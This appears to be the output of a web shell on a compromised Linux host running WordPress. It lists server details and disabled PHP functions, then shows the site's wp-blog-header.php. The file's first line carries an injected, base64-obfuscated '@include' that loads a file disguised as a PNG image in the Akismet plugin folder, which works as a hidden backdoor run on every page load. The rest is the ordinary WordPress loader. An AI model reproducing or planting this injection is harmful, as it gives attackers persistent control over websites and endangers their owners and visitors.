HEX
Server: Apache
System: Linux web198 5.14.0-658.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jan 9 20:29:02 UTC 2026 x86_64
User: xh034600 (1031)
PHP: 8.1.34
Disabled: passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,show_source,shell_exec,exec,virtual,proc_get_status,proc_terminate,system,syslog,mail
Upload Files
File: /home/xh034600/www_root_marco_sk/wp-blog-header.php
<?php @include base64_decode("Ly9ob21lL3hoMDM0NjAwL3d3d19yb290X21hcmNvX3NrL3dwLWNvbnRlbnQvcGx1Z2lucy9ha2lzbWV0L19pbmMvaW1nL2xvZ28tcHBvc3BucW9ucnBzcXJub3AucG5n");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}